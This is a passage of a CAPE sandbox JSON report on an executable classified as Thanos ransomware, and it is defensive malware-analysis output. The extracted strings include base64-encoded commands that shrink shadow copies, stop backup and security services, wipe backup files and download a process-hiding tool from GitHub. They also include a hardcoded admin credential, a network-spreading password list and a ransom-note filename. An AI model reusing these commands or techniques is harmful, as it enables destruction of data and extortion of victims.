| "_CorExeMain", | |
| "3FGC7QZ13R9WNYMW1MISG70EJXK4EVFD", | |
| "kernel32", | |
| "RSAKeys", | |
| "Y3RmbW9tLmV4ZQ==", | |
| "length", | |
| "c3RvcCBOZXRCYWNrdXAgQk1SIE1URlRQIFNlcnZpY2UgL3k=", | |
| "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlNjQuZXhl", | |
| "Shortcut", | |
| "delList", | |
| "DateTime", | |
| "EnumerateDirectories", | |
| "get_Id", | |
| "aHR0cCBhbmFseXplciBzdGFuZC1hbG9uZQ==", | |
| "ProcessCommand", | |
| "set_StandardOutputEncoding", | |
| "ProductVersion", | |
| "Group", | |
| " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">", | |
| "FileAccess", | |
| "mscorlib", | |
| "StructureToByteArray", | |
| "MEM_TOP_DOWN", | |
| "autoexec.bat", | |
| "mystartup.lnk", | |
| "NtSetInformationProcess", | |
| "System.Linq", | |
| "get_Groups", | |
| "!This program cannot be run in DOS mode.", | |
| "set_StartInfo", | |
| "NtReadVirtualMemory", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1nOiAvb249ZzogL21heHNpemU9dW5ib3VuZGVk", | |
| "b2xseWRiZw==", | |
| "GroupCollection", | |
| "WakeUp", | |
| "Export", | |
| "Assembly", | |
| "$$method0x6000013-1", | |
| "WaitForExit", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1lOiAvb249ZTogL21heHNpemU9dW5ib3VuZGVk", | |
| "Internet", | |
| "PathLink", | |
| "ftpUsername", | |
| "Exists", | |
| "endWorker", | |
| "Crypto", | |
| "GetMaxDataLength", | |
| "dizin", | |
| "Th32ProcessId", | |
| "MessageBoxIcon", | |
| "TnVtYmVyIG9mIGZpbGVzIHRoYXQgd2VyZSBwcm9jZXNzZWQgaXM6IA==", | |
| "L3MgL2YgL3EgZzpcKi5WSEQgZzpcKi5iYWMgZzpcKi5iYWsgZzpcKi53YmNhdCBnOlwqLmJrZiBnOlxCYWNrdXAqLiogZzpcYmFja3VwKi4qIGc6XCouc2V0IGc6XCoud2luIGc6XCouZHNr", | |
| "clear", | |
| "UtilMe", | |
| "c3RvcCBTYXZSb2FtIC95", | |
| " -u EDENFIELD\\efadmin -p P455w0rd -d -f -h -s -n 2 -c ", | |
| "Recycle.Bin", | |
| "System.Collections.Generic", | |
| "c3RvcCBZb29JVCAveQ==", | |
| "OpenProcess", | |
| "string_length", | |
| "address", | |
| "cmd.exe", | |
| "WindowsPrincipal", | |
| "[Summary]", | |
| "ZGxsaHN0LmV4ZQ==", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1nOiAvb249ZzogL21heHNpemU9NDAxTUI=", | |
| "Stream", | |
| "Stack`1", | |
| "Match", | |
| "LogonPass", | |
| "Predicate`1", | |
| "hObject", | |
| "PAGE_READONLY", | |
| "base64EncodedData", | |
| "Process", | |
| "files", | |
| "encrypted", | |
| "bHNhc3MuZXhl", | |
| "Administrator", | |
| "ZG90cGVlaw==", | |
| "Encrypt", | |
| "L3MgL2YgL3EgZjpcKi5WSEQgZjpcKi5iYWMgZjpcKi5iYWsgZjpcKi53YmNhdCBmOlwqLmJrZiBmOlxCYWNrdXAqLiogZjpcYmFja3VwKi4qIGY6XCouc2V0IGY6XCoud2luIGY6XCouZHNr", | |
| "subnetMask", | |
| "GeneralFilesList", | |
| "WebRequest", | |
| "FileInfo", | |
| "aW50ZXJjZXB0ZXI=", | |
| "WebResponse", | |
| "Y2FsYy5leGU=", | |
| "AesManaged", | |
| "System.Management", | |
| "ftpadmin", | |
| "administrator123", | |
| "Contains", | |
| "hotkey", | |
| "$$method0x60000b2-1", | |
| "select * from Win32_NetworkConnection", | |
| "ActiveAfterDateTime", | |
| "<GetIPInfo>b__3", | |
| "UHJvY2Vzc0hhY2tlcg==", | |
| "dGFza2tpbGw=", | |
| "backup", | |
| "InAttribute", | |
| "_HostName", | |
| "RNGCryptoServiceProvider", | |
| "c3RvcCBRQkNGTW9uaXRvclNlcnZpY2UgL3k=", | |
| "ParallelLoopResult", | |
| "ProcessName", | |
| "windows", | |
| "User1", | |
| "support", | |
| "1234567", | |
| "$F935DC23-1CF0-11D0-ADB9-00C04FD58A0B", | |
| "KillTM", | |
| "MEM_RELEASE", | |
| "CipherMode", | |
| "DirectoryNotFoundException", | |
| "get_StandardOutput", | |
| "SymmetricAlgorithm", | |
| "c3RvcCBtZmV3YyAveQ==", | |
| "IPAddress", | |
| "System.Windows.Forms", | |
| "set_RelativePath", | |
| "targetFilePath", | |
| "SPIF_UPDATEINIFILE", | |
| "guest123", | |
| "L3YgL2ZvIGNzdg==", | |
| "WebClient", | |
| "Complex.cvew", | |
| ".text", | |
| "AllocExternalMemory", | |
| "state", | |
| "appName", | |
| "fileInfo", | |
| "ToInt64", | |
| "rootDir", | |
| "192.168.", | |
| "sf.txt", | |
| "Complex", | |
| "<Encrypt2>b__18", | |
| "SrcAddress", | |
| "MemAddress", | |
| "NextInt", | |
| "ftpPassword", | |
| "get_OSFullName", | |
| "internet explorer", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1kOiAvb249ZDogL21heHNpemU9dW5ib3VuZGVk", | |
| "memSize", | |
| "FileShare", | |
| "DefineDosDevice", | |
| "u32ProcessId", | |
| "excluded", | |
| "get_HostName", | |
| "Registry", | |
| "PlatformNotSupportedException", | |
| "processorID", | |
| "microsoft corporation", | |
| "GetAllMacAddressesAndIppairs", | |
| "set_Mode", | |
| "CryptoStream", | |
| "get_Arguments", | |
| "ModuleAddress", | |
| "Base64Decode", | |
| " </security>", | |
| "c3RvcCBCYWNrdXBFeGVjSm9iRW5naW5lIC95", | |
| "<MacAddress>k__BackingField", | |
| "MODULEENTRY32", | |
| "<Killproc>b__4", | |
| "get_Value", | |
| "get_Description", | |
| "CS$<>8__localsf", | |
| "QXRlbnRpb24h", | |
| "desktop.ini", | |
| "VolumeSerialNumber", | |
| "Mutex", | |
| "PublicKey", | |
| "Program", | |
| "InitializeArray", | |
| "Resolve", | |
| " </trustInfo>", | |
| "IconIndex=0", | |
| "iconPath", | |
| "MultipleThreads", | |
| "get_MacAddress", | |
| "CompilationRelaxationsAttribute", | |
| "TypeLibTypeAttribute", | |
| "c3lzaW50ZXJuYWxzIHRjcHZpZXc=", | |
| "set_Priority", | |
| "ArgumentException", | |
| "123456", | |
| "RandomString", | |
| "TmV0d29ya01pbmVy", | |
| "CatchDrv", | |
| "L3MgL2YgL3EgZDpcKi5WSEQgZDpcKi5iYWMgZDpcKi5iYWsgZDpcKi53YmNhdCBkOlwqLmJrZiBkOlxCYWNrdXAqLiogZDpcYmFja3VwKi4qIGQ6XCouc2V0IGQ6XCoud2luIGQ6XCouZHNr", | |
| "Convert", | |
| "Activator", | |
| "set_RedirectStandardOutput", | |
| "bW91bnR2b2wgfCBmaW5kICJ9XCIgPiB2LnR4dAoKKEZvciAvRiAlJWkgSW4gKHYudHh0KSBEbyAoCiAgICAgIFNldCBmcmVlZHJpdmU9MAogICAgICBGT1IgJSVkIElOIChDIEQgRSBGIEcgSCBJIEogSyBMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWikgRE8gKAogICAgICAgICAgICBJRiBOT1QgRVhJU1QgJSVkOlwgKAogICAgICAgICAgICAgICAgICBJRiAiIWZyZWVkcml2ZSEiPT0iMCIgKAogICAgICAgICAgICAgICAgICAgICAgICBTZXQgZnJlZWRyaXZlPSUlZAogICAgICAgICAgICAgICAgICApCiAgICAgICAgICAgICkKICAgICAgKQogICAgICBtb3VudHZvbCAhZnJlZWRyaXZlITogJSVpCiAgICAgIHBpbmcgLW4gMiAxMjcuMC4wLjEKKSkKU2V0IGRyaXZlaWQ9MApGT1IgJSVkIElOIChDIEQgRSBGIEcgSCBJIEogSyBMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWikgRE8gKAogICAgICBJRiBFWElTVCAlJWQ6XCAoCiAgICAgICAgICAgIFNldCAvYSBkcml2ZWlkKz0xCiAgICAgICAgICAgIGVjaG8gXjxTaGFyZWRGb2xkZXIgbmFtZT0iIWRyaXZlaWQhIiBob3N0UGF0aD0iJSVkOlwiIHdyaXRhYmxlPSJ0cnVlIi9ePiA+PnNmLnR4dAogICAgICAgICAp", | |
| "System.Text.RegularExpressions", | |
| "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>", | |
| "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">", | |
| "localFilePath", | |
| "scList", | |
| "QnVpbGRlcl9Mb2c=", | |
| "processInformation", | |
| "hideOnlyTrojan", | |
| "iSubItem", | |
| "Remove", | |
| "#Strings", | |
| "IDisposable", | |
| "get_Date", | |
| " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">", | |
| "set_FileName", | |
| "netguest", | |
| "text2", | |
| "Binder", | |
| "ToUpper", | |
| "RemoteGetProcAddressManual", | |
| "MEM_DECOMMIT", | |
| "c3RvcCBJbnR1aXQuUXVpY2tCb29rcy5GQ1MgL3k=", | |
| "powershell", | |
| "lParam", | |
| "WriteAllText", | |
| "BitConverter", | |
| "WrapNonExceptionThrows", | |
| "aHR0cDovL2ljYW5oYXppcC5jb20=", | |
| "sifre", | |
| "get_IPAddress", | |
| "Array", | |
| "Microsoft.Win32", | |
| "appGuid", | |
| "get_UserName", | |
| "LegalText", | |
| "U32Size", | |
| "FileStream", | |
| "RuntimeHelpers", | |
| "AllocHGlobal", | |
| "StartsWith", | |
| "ProcessKiller", | |
| "get_Now", | |
| "TextWriter", | |
| "strProcess", | |
| "SearchOption", | |
| "OpenSubKey", | |
| "SzModule", | |
| "sc.exe", | |
| "Installer...", | |
| "set_Method", | |
| "c3RvcCBZb29CYWNrdXAgL3k=", | |
| "iItem", | |
| "AntiKill", | |
| "Tm9GdXNlckV4", | |
| "arguments", | |
| "Enumerable", | |
| "RegistryKey", | |
| "Q2xpZW50IFVuaXF1ZSBJZGVudGlmaWVyIEtleTog", | |
| "GetModuleHandle", | |
| "CommonAce", | |
| "AntiVM", | |
| "get_Count", | |
| "PAGE_EXECUTE_READWRITE", | |
| "Islocked", | |
| "excomunicated", | |
| "PropertyDataCollection", | |
| "GetKernelObjectSecurity", | |
| "100000000", | |
| "GetEncoding", | |
| "GetFiles", | |
| "RegistryValueKind", | |
| "Matches", | |
| "set_TargetPath", | |
| "Model", | |
| "ReadProcessMemory", | |
| "Microsoft.VisualBasic.Devices", | |
| "Environment", | |
| "Guest", | |
| "System.Security.Cryptography", | |
| "perflogs", | |
| "process", | |
| "NullReferenceException", | |
| "Close", | |
| "get_WindowStyle", | |
| "PropertyData", | |
| "Upper", | |
| "IconLocation", | |
| "CS$<>9__CachedAnonymousMethodDelegate2", | |
| "IsVolatile", | |
| "targetPath", | |
| "program files", | |
| "DesAddress", | |
| "LeaveRegards", | |
| "cHJvdGVjdGlvbl9pZA==", | |
| "StringSplitOptions", | |
| "WaitHandle", | |
| "DownloadTool", | |
| "qwe123", | |
| "<Crypt>b__d", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1kOiAvb249ZDogL21heHNpemU9NDAxTUI=", | |
| "qwert", | |
| "isDebuggerPresent", | |
| "kernel32.dll", | |
| "GetProcesses", | |
| "System.IO", | |
| "System.Net.NetworkInformation", | |
| "L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsIA==", | |
| "get_IconLocation", | |
| "Concat", | |
| "Live4Ever", | |
| "Reverse", | |
| "vssList", | |
| "IPStatus", | |
| "iconcache.db", | |
| "Rfc2898DeriveBytes", | |
| "ASCIIEncoding", | |
| "ZG90cGVlazY0", | |
| "c3Bvb2xjdi5leGU=", | |
| "000004b0", | |
| "test123", | |
| "ProcessCritical", | |
| "<>c__DisplayClass16", | |
| "VirtualFreeEx", | |
| "SPIF_SENDWININICHANGE", | |
| "set_KeySize", | |
| "DisableTaskMgr", | |
| "ExpireOption", | |
| "Encryptions", | |
| "DisTaskManager", | |
| "Replace", | |
| "get_Path", | |
| "TnVtYmVyIG9mIGZpbGVzIGVuY3J5cHRlZDog", | |
| "bXNodGEuZXhl", | |
| "c3RvcCBjY1NldE1nciAveQ==", | |
| "Key size is not valid", | |
| "UdpClient", | |
| "LANShares", | |
| "lpAddress", | |
| "DetectManufacturer", | |
| "dwFreeType", | |
| "CreateToolhelp32Snapshot", | |
| "lpflOldProtect", | |
| "ValueType", | |
| "System.Text", | |
| "b3BlcmEzMi5leGU=", | |
| "__StaticArrayInitTypeSize=240", | |
| "IpAddress", | |
| "ZmlyZWZveC5leGU=", | |
| "Capture", | |
| "SearchFiles", | |
| "pHandle", | |
| "StreamWriter", | |
| ".locked", | |
| "RandomNumberGenerator", | |
| "lpszVolumeMountPoint", | |
| "Aditional KeyId:", | |
| "InterNetwork", | |
| "bootsect.bak", | |
| "Administrador de tareas", | |
| "DeriveBytes", | |
| "dnames", | |
| "RW5hYmxlTGlua2VkQ29ubmVjdGlvbnM=", | |
| "Cleanup", | |
| "pagefile.sys", | |
| "55555", | |
| "LVM_GETITEMCOUNT", | |
| "NotifyCustom", | |
| "LegalTitle", | |
| "GetFolderPath", | |
| "c3RvcCBjY0V2dE1nciAveQ==", | |
| "Guest123", | |
| "cHJvY2V4cDY0", | |
| "Arguments", | |
| "Split", | |
| "get_SystemDirectory", | |
| "set_IconLocation", | |
| "get_FileName", | |
| "ComputerInfo", | |
| "Data are empty", | |
| "HookApplication", | |
| "dwDesiredAccess", | |
| "MySign", | |
| "dGFza2xpc3Q=", | |
| "GetRequestStream", | |
| "user123", | |
| "PAGE_NOCACHE", | |
| "passes", | |
| "PathTooLongException", | |
| "ntdll.dll", | |
| "CheckRemoteDebuggerPresent", | |
| "172.16.", | |
| "OriginalFilename", | |
| "NtReadVirtualMemory_AsmOpCode", | |
| "PAGE_EXECUTE_WRITECOPY", | |
| "get_FullName", | |
| "DispIdAttribute", | |
| "ProcessModule", | |
| "<------------>", | |
| "lpDeviceName", | |
| "PingReply", | |
| "123321", | |
| "Th32ModuleId", | |
| "inputFile", | |
| "subnet", | |
| "securityInformation", | |
| "PROCESS_VM_READ", | |
| "$$method0x60000c4-1", | |
| "CreateInstance", | |
| "set_Key", | |
| "Start", | |
| "FromXmlString", | |
| "PAGE_GUARD", | |
| "ComImportAttribute", | |
| "GlblcntUsage", | |
| "c3RvcCBWZWVhbU5GU1N2YyAveQ==", | |
| "netShadowList", | |
| "flProtect", | |
| "Round", | |
| "fileToDelete", | |
| "DetectSandboxie", | |
| "CS$<>9__CachedAnonymousMethodDelegate4", | |
| "stateMask", | |
| "config.sys", | |
| "ICryptoTransform", | |
| "PartialEncrytion", | |
| "GetEntryAssembly", | |
| "get_IsReady", | |
| "S2V5IElkZW50aWZpZXI6IA==", | |
| "PHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPg==", | |
| "lpModuleName", | |
| "\\C$ /user:Administrator Administrator", | |
| "ThreadStart", | |
| "SPI_SETDESKWALLPAPER", | |
| "ReadToEnd", | |
| "HorseMount", | |
| "administrator", | |
| "DriveInfo", | |
| "Assembly Version", | |
| "cHJvY2V4cA==", | |
| "Func`2", | |
| "processInformationLength", | |
| "System.Collections.Specialized", | |
| "set_RedirectStandardError", | |
| "Clear", | |
| "Parse", | |
| "Microsoft.VisualBasic.CompilerServices", | |
| "sourceFilePath", | |
| "CS$<>9__CachedAnonymousMethodDelegate8", | |
| "set_Arguments", | |
| "lpTargetPath", | |
| "className", | |
| "TG9jYWxBY2NvdW50VG9rZW5GaWx0ZXJQb2xpY3k=", | |
| "mscoree.dll", | |
| "c3RvcCBWZWVhbURlcGxveW1lbnRTZXJ2aWNlIC95", | |
| "DisableAMSI", | |
| "lpExistingFileName", | |
| "SizeOf", | |
| "FirstOrDefault", | |
| "AntiSniffer", | |
| "manager", | |
| "Int32", | |
| "\\HOW_TO_DECYPHER_FILES.txt", | |
| "String", | |
| "ManagementClass", | |
| "HostName", | |
| "get_Properties", | |
| "ipAddress", | |
| "HideProcess", | |
| "TrimFile", | |
| "SzeExePath", | |
| "Sniffing", | |
| "HideAllProcesses", | |
| "ToUInt32", | |
| "win32_processor", | |
| "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlMzIuZXhl", | |
| "Q2xpZW50IElQOiAg", | |
| "L0MgcGluZyAxMjcuMC4wLjcgLW4gMyA+IE51bCAmIGZzdXRpbCBmaWxlIHNldFplcm9EYXRhIG9mZnNldD0wIGxlbmd0aD01MjQyODgg4oCcJXPigJ0gJiBEZWwgL2YgL3Eg4oCcJXPigJ0=", | |
| "WalkDirectoryTree", | |
| "hSnapshot", | |
| "3747bdbf-0ef0-42d8-9234-70d68801f407", | |
| "lpNewFileName", | |
| " process call create cmd.exe /c \\\\", | |
| "zxc123", | |
| "get_Message", | |
| "Regex", | |
| "VirtualBox", | |
| "DownloadFile", | |
| "value", | |
| "DllImportAttribute", | |
| "RelativePath", | |
| "GetValue", | |
| "c3RvcCBzdGNfcmF3X2FnZW50IC95", | |
| "<>c__DisplayClass1c", | |
| "LockedFiles", | |
| "lpdwProcessId", | |
| "match", | |
| "MessageBoxButtons", | |
| "targetDir", | |
| "MEM_COMMIT", | |
| "c3RvcCBEZWZXYXRjaCAveQ==", | |
| "LVITEM", | |
| "AlternateAlgo", | |
| "Delete", | |
| "sqlite3", | |
| "IWshShortcut", | |
| "Collect", | |
| "GetProcessesByName", | |
| "V1NjcmlwdC5TaGVsbA==", | |
| "SendMessage", | |
| "set_Credentials", | |
| "OpenFilesList", | |
| "FileSystemInfo", | |
| "ModBaseSize", | |
| "System.Threading.Tasks", | |
| "VS_VERSION_INFO", | |
| "dwSize", | |
| "LimitMe", | |
| "appdata", | |
| "<Killproc>b__5", | |
| "GetProcessId", | |
| "MjA0OCE8UlNBS2V5VmFsdWU+PE1vZHVsdXM+bksvNHYwNlJOS2UzWU9FRTJXRVBQbE9EajF3aFh4UGxZZTcyZXRnUm9uR2JOQ3lMbTJFTjd3aWh6NkIxaDJYRkx5OGsydjhPUUJ6RTFocHZuRE5WOTlJdHQzL3dPaEpJei93QTA0MTg1MVFkY3lnTmlhYkdhT2VFWUdGZEZvQUlOT2VyalNUaFV3S1JuQTUwcW9qekRFc1kzbHhsMFVuUjlDaGJtL3JxM2s5NHZkbFVuNk1GZGw0cVFQTkowdC9SSzdyOGFhKzcvSkNIVTdKRWtVVElMZ3ZhZnd6bHZtZjcxSmd5bUI3Njlvb242eVZFcXoxQVZOZHlWT3lkQnVINEFEYlI5SGlBeVFoT3dWQ0NYdVlHeUEzRHhKbGJUSHh0U2lKaVU2VkNjVjNBV21zMk1DMFR4V0NRakNSNnpNRmpoK2dYMXNmRVlpMHM1RldwVnlPcnJ3PT08L01vZHVsdXM+PEV4cG9uZW50PkFRQUI8L0V4cG9uZW50PjwvUlNBS2V5VmFsdWU+", | |
| "bXlzcWxkLmV4ZQ==", | |
| "Deceive", | |
| "ntWB6ohspNIoCar", | |
| "Global\\", | |
| "ACCESO", | |
| "NetScan", | |
| "ReadFromFile", | |
| "CalculateOffset", | |
| "PaddingMode", | |
| "System.Net.Sockets", | |
| "FromStream", | |
| "processesToCheck", | |
| "aWRhNjQ=", | |
| "AES256KeySize", | |
| "VirtualProtectEx" | |
| ], | |
| "virustotal": { | |
| "error": true, | |
| "msg": "Unable to complete connection to VirusTotal. Status code: 429" | |
| }, | |
| "selfextract": { | |
| "overlay": { | |
| "extracted_files": [ | |
| { | |
| "name": "e5a00aa9991ac8a5ee3109844d84a55583bd20572ad3ffcd42792f3c36b183ad", | |
| "path": "/opt/CAPEv2/storage/analyses/1140/selfextracted/e5a00aa9991ac8a5ee3109844d84a55583bd20572ad3ffcd42792f3c36b183ad", | |
| "guest_paths": [ | |
| "overlay" | |
| ], | |
| "size": 2048, | |
| "crc32": "F1E8BA9E", | |
| "md5": "c99a74c555371a433d121f551d6c6398", | |
| "sha1": "605db3fdbaff4ba13729371ad0c4fbab3889378e", | |
| "sha256": "e5a00aa9991ac8a5ee3109844d84a55583bd20572ad3ffcd42792f3c36b183ad", | |
| "sha512": "8785f615b30c07eb4c5f5d72c9b3663521081581ec670631b28be491f5f7ad6c6757b9a2025c68471fa3c9db65305804f6ec6dfd15159b02e91c58ad570e92fb", | |
| "rh_hash": null, | |
| "ssdeep": "3::", | |
| "type": "data", | |
| "yara": [], | |
| "cape_yara": [], | |
| "clamav": [], | |
| "tlsh": null, | |
| "sha3_384": "02d874db7e9d3d590b0300d47e5cad756991021de37f50f0944a40fe6f8437b82ca13f26c9bddccd506a1847ced615bd", | |
| "data": null | |
| } | |
| ], | |
| "extracted_files_time": 0.0007757069543004036, | |
| "password": "" | |
| } | |
| }, | |
| "cape_type_code": 0, | |
| "cape_type": "Thanos Payload: 32-bit executable" | |
| } | |
| }, | |
| "detections": [ | |
| { | |
| "family": "Thanos", | |
| "details": [ | |
| { | |
| "Yara": "ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75" | |
| } | |
| ] | |
| } | |
| ], | |
| "CAPE": { | |
| "payloads": [], | |
| "configs": [] | |
| }, | |
| "info": { | |
| "version": "2.4-CAPE", | |
| "started": "2025-02-21 16:18:56", | |
| "ended": "2025-02-21 16:23:02", | |
| "duration": 246, | |
| "id": 1140, | |
| "category": "file", | |
| "custom": "", | |
| "machine": { | |
| "id": 1137, | |
| "status": "stopping", | |
| "name": "baseline", | |
| "label": "win10-2", | |
| "platform": "windows", | |
| "manager": "KVM", | |
| "started_on": "2025-02-21 16:18:56", | |
| "shutdown_on": "2025-02-21 16:23:02" | |
| }, | |
| "package": "exe", | |
| "timeout": false, | |
| "shrike_url": null, | |
| "shrike_refer": null, | |
| "shrike_msg": null, | |
| "shrike_sid": null, | |
| "parent_id": null, | |
| "tlp": null, | |
| "parent_sample": {}, | |
| "options": {}, | |
| "source_url": null, | |
| "route": "false", | |
| "user_id": 0, | |
| "CAPE_current_commit": "f89c890143b59bdbcc9b9c8b5e15fbc5fd827afd" | |
| }, | |
| "behavior": { | |
| "processes": [] | |
| }, | |
| "debug": { | |
| "log": "2025-02-13 13:27:44,988 [root] INFO: Date set to: 20250221T15:19:00, timeout set to: 180\n2025-02-21 15:19:00,384 [root] DEBUG: Starting analyzer from: C:\\tmp7wr5rocj\n2025-02-21 15:19:00,384 [root] DEBUG: Storing results at: C:\\KGHrEg\n2025-02-21 15:19:00,384 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\HYuCJLr\n2025-02-21 15:19:00,384 [root] DEBUG: Python path: C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32\n2025-02-21 15:19:00,384 [root] INFO: analysis running as an admin\n2025-02-21 15:19:00,384 [root] INFO: analysis package specified: \"exe\"\n2025-02-21 15:19:00,384 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-02-21 15:19:00,384 [root] DEBUG: imported analysis package \"exe\"\n2025-02-21 15:19:00,384 [root] DEBUG: initializing analysis package \"exe\"...\n2025-02-21 15:19:00,384 [lib.common.common] INFO: wrapping\n2025-02-21 15:19:00,384 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-02-21 15:19:00,384 [root] DEBUG: New location of moved file: C:\\Users\\pacop\\AppData\\Local\\Temp\\ae66e009e16f0fad3b70ad20\n2025-02-21 15:19:00,384 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-02-21 15:19:00,384 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-02-21 15:19:00,384 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-02-21 15:19:00,384 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-02-21 15:19:00,384 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-02-21 15:19:00,400 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-02-21 15:19:00,400 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-02-21 15:19:00,431 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-02-21 15:19:00,431 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-02-21 15:19:00,431 [lib.api.screenshot] ERROR: No module named 'PIL'\n2025-02-21 15:19:00,431 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-02-21 15:19:00,431 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-02-21 15:19:00,447 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-02-21 15:19:00,447 [root] DEBUG: attempting to configure 'Browser' from data\n2025-02-21 15:19:00,478 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-02-21 15:19:00,478 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-02-21 15:19:00,572 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-02-21 15:19:00,572 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-02-21 15:19:00,572 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-02-21 15:19:00,572 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-02-21 15:19:00,572 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-02-21 15:19:00,572 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-02-21 15:19:01,358 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-02-21 15:19:01,358 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-02-21 15:19:01,358 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-02-21 15:19:01,358 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-02-21 15:19:01,358 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-02-21 15:19:01,358 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-02-21 15:19:01,358 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-02-21 15:19:01,358 [modules.auxiliary.disguise] INFO: Disguising GUID to f5dea467-f3d0-4b19-9875-d7933c3287cb\n2025-02-21 15:19:01,358 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-02-21 15:19:01,358 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-02-21 15:19:01,358 [root] DEBUG: attempting to configure 'Human' from data\n2025-02-21 15:19:01,358 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-02-21 15:19:01,358 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-02-21 15:19:01,358 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-02-21 15:19:01,358 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-02-21 15:19:01,358 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-02-21 15:19:01,358 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-02-21 15:19:01,358 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-02-21 15:19:01,364 [modules.auxiliary.screenshots] WARNING: Python Image Library is not installed, screenshots are disabled\n2025-02-21 15:19:01,364 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-02-21 15:19:01,364 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-02-21 15:19:01,364 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-02-21 15:19:01,364 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-02-21 15:19:01,364 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-02-21 15:19:01,368 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 660\n2025-02-21 15:19:01,409 [lib.api.process] INFO: Monitor config for <Process 660 lsass.exe>: C:\\tmp7wr5rocj\\dll\\660.ini\n2025-02-21 15:19:01,409 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-02-21 15:19:01,409 [lib.api.process] INFO: 64-bit DLL to inject is C:\\tmp7wr5rocj\\dll\\xArRdOM.dll, loader C:\\tmp7wr5rocj\\bin\\daJgSpgl.exe\n2025-02-21 15:19:01,431 [root] DEBUG: Loader: Injecting process 660 with C:\\tmp7wr5rocj\\dll\\xArRdOM.dll.\n2025-02-21 15:19:01,439 [root] DEBUG: 660: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-02-21 15:19:01,439 [root] INFO: Disabling sleep skipping.\n2025-02-21 15:19:01,439 [root] DEBUG: 660: TLS secret dump mode enabled.\n2025-02-21 15:19:01,450 [root] DEBUG: 660: RtlInsertInvertedFunctionTable 0x00007FFA1A78090E, LdrpInvertedFunctionTableSRWLock 0x00007FFA1A8DD510\n2025-02-21 15:19:01,450 [root] DEBUG: 660: Monitor initialised: 64-bit capemon loaded in process 660 at 0x00007FF9DA7E0000, thread 6160, image base 0x00007FF786A90000, stack from 0x000000490DB73000-0x000000490DB80000\n2025-02-21 15:19:01,472 [root] DEBUG: 660: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-02-21 15:19:01,493 [root] DEBUG: 660: 